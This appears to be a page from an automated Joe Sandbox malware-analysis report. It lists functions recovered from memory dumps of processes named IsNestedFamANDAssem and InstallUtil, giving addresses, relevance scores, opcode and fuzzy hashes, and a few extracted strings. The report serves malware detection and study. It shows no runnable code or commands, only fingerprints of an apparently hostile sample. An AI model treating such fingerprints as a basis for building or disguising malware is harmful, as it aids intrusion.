                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a7cc0549bd3b57842776e029ea0a55da3fc849539d0f4d61db8ec4bac677d8d9
                                                          • Instruction ID: 811638d9f809efb8032e780c24516ce6130bdb1eff2192af9e379bd47c687f7c
                                                          • Opcode Fuzzy Hash: a7cc0549bd3b57842776e029ea0a55da3fc849539d0f4d61db8ec4bac677d8d9
                                                          • Instruction Fuzzy Hash: 8AD09278909229DFDF608F50DC44BD9B779BB49304F0011D5D64DA3250CB355A868F05
                                                          Function 01660841 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: bb8f04b38455451ba3ddf5b7f4715c4451acd317c8856208da29b52666fd1bd1
                                                          • Instruction ID: 96a2f74eebc487cba2f94ce67cb27114d5f74bd72b592adcb88f748a4c6962d4
                                                          • Opcode Fuzzy Hash: bb8f04b38455451ba3ddf5b7f4715c4451acd317c8856208da29b52666fd1bd1
                                                          • Instruction Fuzzy Hash: B7C08C7184D380CFC7824F20986D1423BB99B22223B0614FEE04286317F79C0C428B12
                                                          Function 01664AE5 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 73e507d1eafa42114deadf38deeafd17dcb9c22f3df0c9f1a3cdae1e1fb36288
                                                          • Instruction ID: cb7b9cfa1ff3b2191bfd9eeaff12c9e792bf74053085316b3cc80ba0b07bc505
                                                          • Opcode Fuzzy Hash: 73e507d1eafa42114deadf38deeafd17dcb9c22f3df0c9f1a3cdae1e1fb36288
                                                          • Instruction Fuzzy Hash: B0D0B1B89066688FCB20CF64EA84BDABBB5BB48345F1011EAD949B3254D6746E85CF00
                                                          Function 06D773E0 Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2385789098.0000000006D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 06D70000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_6d70000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 159a501e7e8a257a0e15c487f2a1c0e65c93c5468f3cbf894501b4b1a814d543
                                                          • Instruction ID: fc0a37d66e711b92a7e0ef12a8bcdfd9c397f2f67e7e374a227797a584d6e7c0
                                                          • Opcode Fuzzy Hash: 159a501e7e8a257a0e15c487f2a1c0e65c93c5468f3cbf894501b4b1a814d543
                                                          • Instruction Fuzzy Hash: 94C00276E5001A9A8B00DAD9E4508DCB774EB94321B004066E224A6104D63015268B50
                                                          Function 01660A57 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.2367993349.0000000001660000.00000040.00000800.00020000.00000000.sdmp, Offset: 01660000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_1660000_IsNestedFamANDAssem.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: dd90360ff7e80fee1bb985ea48e6020990d12521d30e34628d2294ca83df76c9
                                                          • Instruction ID: 37f755bc80dd581d9f1937f8987e639f5e5908ac6c67ba95380d30a547034486
                                                          • Opcode Fuzzy Hash: dd90360ff7e80fee1bb985ea48e6020990d12521d30e34628d2294ca83df76c9
                                                          • Instruction Fuzzy Hash: 05B0123001D342CFC215CF65DE5D6353B3C5E0130970640D1E00382057C72E1846C732

                                                          Executed Functions

                                                          Function 02BB1A30 Relevance: 2.7, Strings: 2, Instructions: 218COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7@A$Te]q
                                                          • API String ID: 0-2080396276
                                                          • Opcode ID: 24bc04fa4989308164480898e4cc70f0d17ba937d02c0b4d9a6e925536c666f0
                                                          • Instruction ID: a63701a440249fa0397cb0383c8608d88af5e4a3a0a0ed58a3aff2697525f4e8
                                                          • Opcode Fuzzy Hash: 24bc04fa4989308164480898e4cc70f0d17ba937d02c0b4d9a6e925536c666f0
                                                          • Instruction Fuzzy Hash: FB915D35A10104CFD719DF68E5A8BEA77F2FF89311F2484A4E0099B368D7B0AC85CB50
                                                          Function 02BB1A40 Relevance: 2.7, Strings: 2, Instructions: 213COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 7@A$Te]q
                                                          • API String ID: 0-2080396276
                                                          • Opcode ID: 07368950b8728dbfcdb07b3c2d12902fc22dd1e2a20480af1a86ba81041b9841
                                                          • Instruction ID: ae43e74426a4b7c37f6470d45a165be476d8b5d2dd68f9d9c604c0f454108ea9
                                                          • Opcode Fuzzy Hash: 07368950b8728dbfcdb07b3c2d12902fc22dd1e2a20480af1a86ba81041b9841
                                                          • Instruction Fuzzy Hash: 08814D35A10104CFD719DF68E5A8BE977F2EF88311F2584A5E4099B369D7B0AC85CB50
                                                          Function 02BB20A9 Relevance: 1.5, Strings: 1, Instructions: 256COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: Ddq
                                                          • API String ID: 0-562783569
                                                          • Opcode ID: c7ec4d8eb8e210112d6b9afdeb9a44bd58c559320e0f2af653f0af380b1f668c
                                                          • Instruction ID: 7624bf3a022ef302c5bbe2a1e092682e3751a2caddda56d0124de00d7fe5c124
                                                          • Opcode Fuzzy Hash: c7ec4d8eb8e210112d6b9afdeb9a44bd58c559320e0f2af653f0af380b1f668c
                                                          • Instruction Fuzzy Hash: 20A19075A006119FCB16DF68D544AADBBF2FF88310F1185A9E805EB3A5DB70EC41CB90
                                                          Function 02BB0932 Relevance: 1.3, Strings: 1, Instructions: 45COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: pk
                                                          • API String ID: 0-2816773387
                                                          • Opcode ID: 257b4fb21344846bdcb0436d3857ad2be2565da362254b2017d063b840aa0227
                                                          • Instruction ID: cbbf2514a2dac735de632b6c6d3cc4d95abb9fc7ec1e9200a648e5c675a8f874
                                                          • Opcode Fuzzy Hash: 257b4fb21344846bdcb0436d3857ad2be2565da362254b2017d063b840aa0227
                                                          • Instruction Fuzzy Hash: 140181335287909FC313AB68E8557A13BB4AF1B324B1944DBC494CB2A2D269AC00CB92
                                                          Function 02BB18C0 Relevance: .1, Instructions: 111COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 5d508a35c69ce074e5f4b854f84f91e0f98fd64c6427b80d5507255ee4e91567
                                                          • Instruction ID: a41b756855de4d7ca51b04231db700338ddff8bb7b84b7a0599d81196048ac02
                                                          • Opcode Fuzzy Hash: 5d508a35c69ce074e5f4b854f84f91e0f98fd64c6427b80d5507255ee4e91567
                                                          • Instruction Fuzzy Hash: 6D31AF367102019FDB16DA69D854BBA77E6FF88360F1485B6E009CB354EBB4DC42CB50
                                                          Function 02BB17E9 Relevance: .0, Instructions: 48COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 2806ef3c98536cab7a88b5705bad0112d7c7b5bc975d392928a35fd0fbb02392
                                                          • Instruction ID: d5e1cbcf7f989f89ce0dd41fdd593f79f74b612874a82b31c4d0a55f1cf913b9
                                                          • Opcode Fuzzy Hash: 2806ef3c98536cab7a88b5705bad0112d7c7b5bc975d392928a35fd0fbb02392
                                                          • Instruction Fuzzy Hash: 1C11D271D15208EFCB42DFA8E8556ECBBF1FF4A304F2484EAC01897251D7B56A94CB81
                                                          Function 02BB17F8 Relevance: .0, Instructions: 42COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: b2ad082f04cb638edfa28e1352786f16a64611fcbc02cf5247d75b3bd3870b43
                                                          • Instruction ID: 90d9156f7898410f090682e65abecfb1ace4a247f4f7f54743a2a9b104fa5219
                                                          • Opcode Fuzzy Hash: b2ad082f04cb638edfa28e1352786f16a64611fcbc02cf5247d75b3bd3870b43
                                                          • Instruction Fuzzy Hash: CB11EE70D10208EFCB41EFA9E9547ECBBF1FF89300F2084A9C009A7214E7B46A948B80
                                                          Function 02BB1761 Relevance: .0, Instructions: 16COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 97be08a4f62eeffc6d0ee295b812e94bd96c294d1866c292851aba48f89c5fe3
                                                          • Instruction ID: e34718c904a8f1f79819acbdbe47992ccb0b42dff6511c5a01e4eb140ff648bb
                                                          • Opcode Fuzzy Hash: 97be08a4f62eeffc6d0ee295b812e94bd96c294d1866c292851aba48f89c5fe3
                                                          • Instruction Fuzzy Hash: 5BE08CB28246D0AEDF03DB70F8197283BA0AF23348F0808C8C0408F0A2C66BA8088B11
                                                          Function 02BB16F0 Relevance: .0, Instructions: 15COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3671095e2a9bcda42596f2c307163c924d96e0f539ddad684e2e12a6007da2f7
                                                          • Instruction ID: 8a427b3d65f8335d27acf5c89d455baf55af3cc2d357978c63c008da796bf852
                                                          • Opcode Fuzzy Hash: 3671095e2a9bcda42596f2c307163c924d96e0f539ddad684e2e12a6007da2f7
                                                          • Instruction Fuzzy Hash: 58D0C9B3058B489FC3029BB4FC4AA853BBCEE0A31831840D6E028CA022C62EA544DB21
                                                          Function 02BB361E Relevance: .0, Instructions: 9COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3eea7a912e08987477cc242a96e35a54bd4e5653913f435cdd47e90912058d61
                                                          • Instruction ID: 127fad0b1bc9fe23413d564b58df75ee40700c6f2597764568628e50a3851419
                                                          • Opcode Fuzzy Hash: 3eea7a912e08987477cc242a96e35a54bd4e5653913f435cdd47e90912058d61
                                                          • Instruction Fuzzy Hash: 72C08C30A10404BBDF0A9BD0E8045FD7AB2FF8C200F604054FA0273260CE265D049F24
                                                          Function 02BB1700 Relevance: .0, Instructions: 6COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: a02db0ad8be2e1b6518ea4907ec870f6e3cd94ae154fbf67c3110f3580edd4a6
                                                          • Instruction ID: 860cf3ca280bfdf7ba8266f4ef1e6b2124e1b59ae0fa959dbbee52e66c975599
                                                          • Opcode Fuzzy Hash: a02db0ad8be2e1b6518ea4907ec870f6e3cd94ae154fbf67c3110f3580edd4a6
                                                          • Instruction Fuzzy Hash: EAA01132000208CFC2202BA0B80C20CBB2CEA08202B808020E00E8000A8A2228088B80
                                                          Function 02BB0960 Relevance: .0, Instructions: 5COMMON
                                                          Download Yara Rule
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.2523026771.0000000002BB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02BB0000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_6_2_2bb0000_InstallUtil.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 88c97ef3b99c0c777726e82acf66436f5b11ff9f0640e1e43ac8c7de3cd882d0
                                                          • Instruction ID: 6e2741689ba5f9d18704e07ceb872c0298d02f1b545de5e179a1aeaec9c6b0e3
                                                          • Opcode Fuzzy Hash: 88c97ef3b99c0c777726e82acf66436f5b11ff9f0640e1e43ac8c7de3cd882d0
                                                          • Instruction Fuzzy Hash: 3190023104464C8B855037D5784D555B79C95845157848491A50D415065E6968108795